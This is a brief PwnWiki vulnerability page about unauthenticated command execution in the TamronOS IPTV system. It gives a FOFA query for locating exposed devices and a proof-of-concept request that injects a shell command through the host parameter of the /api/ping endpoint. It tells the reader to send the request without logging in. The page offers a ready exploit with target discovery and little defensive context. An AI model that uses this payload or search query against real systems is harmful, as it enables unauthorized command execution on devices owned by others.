TamronOS IPTV system front-end command execution vulnerability

From PwnWiki
Revision as of 09:47, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "==Vulnerability Impact==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

Vulnerability Impact

TamronOS IPTV All

FOFA

title="TamronOS IPTV系统"

POC

 /api/ping?count=5&host=;id;&port=80&source=1.1.1.1&type=icmp

Then use the POC to go to the foreground (not logged in state) to try to execute the command.

2iptv.png